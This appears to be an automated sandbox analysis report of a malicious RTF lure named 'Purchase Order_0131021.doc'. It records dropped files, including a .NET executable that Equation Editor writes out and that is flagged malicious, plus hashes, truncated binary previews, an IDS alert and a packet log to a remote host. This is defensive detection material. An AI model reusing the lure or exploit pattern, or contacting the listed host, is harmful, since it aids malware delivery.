SHA-512: 2EE72D13C088478A3AE2CE0122586228C2A4BEB0C9CBE54008FF7334ECC25E50AB8D347D36EDF6ABAE9ACAA3D14748FAA1BF710A2AC17934D756E7A9693E0C81
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 95
Entropy (8bit): 4.77019537852511
Encrypted: false
SSDEEP: 3:bDuMJlt34qxpulmX1aWN4qxpulv:bCmoopuPNopu1
MD5: AD3C75BA1EBB2EB0F34E5EDABE1344B8
SHA1: EC8A7EADE69E7CB6FA86D3ACC021470E8186E57B
SHA-256: 84A877A95B14C0E7DDE0A99EB2BF9E56BC85130998E5F2DC3BBF6E4D47AF6F8F
SHA-512: 462AE39D68A4D7A498C2AE2E7AF1C8AEDFC83D0C4A858E86C6A58E44973D8152B89864B3F8049E6E65E3CC695EF29F5A73D46D280507550CA4AFDF8FA6CAB3D1
Malicious: false
Reputation: low
Preview: [folders]..Templates.LNK=0..Purchase Order_0131021.LNK=0..[doc]..Purchase Order_0131021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Reputation: moderate, very likely benign file
                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: ..
                                                                                C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):486912
                                                                                Entropy (8bit):6.778690362170083
                                                                                Encrypted:false
                                                                                SSDEEP:12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
                                                                                MD5:BC5F0AA0262021DB5921D726F7A5B820
                                                                                SHA1:B41245E3BBFC8A7905BFC56B88EA79975595F4F6
                                                                                SHA-256:B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
                                                                                SHA-512:A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                C:\Users\user\Desktop\~$rchase Order_0131021.doc
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 3.45414279609642
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: Purchase Order_0131021.doc
File size: 15658
MD5: fc66be4a9696798aff0be8ed97bd294f
SHA1: cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256: 8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
SHA512: 3d68cde4050df2c0b519a237cd122176c7dcbeb8fb93bbdd6d3caa06ffa1fa37c2357822bf0d4f8d76c21050bd303e9d483dc76566c5b5f08ca72c226e56eb2d
SSDEEP: 384:U/RZbKkaCb3iWkAqF3UuUh/kIkBWsHDvu:UDbKkaOjkX3UuicZMF
File Content Preview: {\rtf3212-@#++`598.?6.[?.?!)7[=(+(*./*91%6[%9!|8:=`;%^$*?#;'*6[13)_<#'.^&.#~&,_2(/;40?5../,;@^%0-^^-<67*08&/5<;[~/=$5&3:*%`1.5$->[*?-8`95?/'%.7(<51@.#^?3![!''9%%%~?]?9!|%3*0+[.2??0)+|-&_&(%.0:%0.4%+4[-.?-36%-8'?.)?.-=)2!0.[6.9+1.=70<`%.+4`>#(.9#2?^3-5>2=0

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 0000033Bh | | | | | | | | no
1 | 000002F8h | | | | | | | | no

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/14/21-10:24:56.289135 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50591 | 8.8.8.8 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2021 10:22:59.049212933 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.071090937 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.071178913 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.071497917 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.093384981 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.100934982 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101012945 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101016045 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101056099 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101078987 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101115942 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101130962 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101166010 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101185083 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101238966 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101269007 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101285934 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101289034 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101325989 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101342916 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101380110 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101458073 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101511002 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.101537943 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.101578951 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.110775948 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123496056 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123564959 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123619080 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123620033 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123667955 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123675108 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123676062 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123725891 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123728991 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123778105 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123780966 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123828888 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123831034 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123872995 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123892069 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123939037 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123944998 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.123989105 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.123995066 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124041080 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124047041 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124090910 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124097109 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124140978 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124145985 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124191046 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124197960 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124241114 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124247074 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124288082 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124305964 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124349117 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124360085 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124383926 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124396086 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124411106 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124453068 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124461889 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124505043 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.124519110 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.124561071 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.125000954 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146296978 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146351099 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146385908 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146388054 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146419048 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146425962 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146425962 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146476984 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146478891 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146513939 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146521091 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146552086 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146558046 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146589994 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146605968 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146636963 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146642923 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146680117 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146688938 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146717072 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146728992 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146754980 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146768093 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146794081 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146801949 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146830082 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146845102 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146867037 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146879911 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146904945 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146919012 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146951914 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.146953106 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.146996021 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147001982 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147032976 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147042990 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147072077 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147089005 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147109985 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147130013 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147173882 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147185087 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147211075 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147245884 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147273064 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147291899 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147315025 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147330046 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147361040 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147361994 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147404909 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147412062 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147440910 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147449017 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147480011 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147483110 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147520065 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147524118 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147557020 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147564888 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147594929 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147602081 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147633076 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147636890 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147676945 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147680044 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147722006 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147725105 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147758007 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147774935 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147787094 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147794962 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147795916 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147834063 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.147840023 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.147877932 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.150798082 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.169621944 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.169739008 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.169790983 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.169827938 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.169873953 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.169954062 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.169955015 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.169994116 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.170011997 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.170032024 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.170042038 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
Oct 14, 2021 10:22:59.170070887 CEST | 80 | 49167 | 144.76.47.167 | 192.168.2.22
Oct 14, 2021 10:22:59.170113087 CEST | 49167 | 80 | 192.168.2.22 | 144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170118093 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170125961 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170160055 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170193911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170197010 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170216084 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170234919 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170253038 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170273066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170293093 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170310020 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170346022 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170347929 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170371056 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170387030 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170403957 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170435905 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170444012 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170476913 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170490980 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170515060 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170528889 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170553923 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170562029 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170591116 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170625925 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170629025 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170664072 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170680046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170697927 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170701981 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170715094 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170748949 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170751095 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170789957 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170809031 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170826912 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170849085 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170864105 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170866966 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170901060 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170918941 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.170938015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170980930 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.170989990 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171009064 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171017885 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171046972 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171056986 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171061993 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171094894 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171117067 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171128035 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171186924 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171236038 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171261072 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171272993 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171279907 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171310902 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171330929 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171359062 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171365023 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171401024 CEST8049167144.76.47.167192.168.2.22
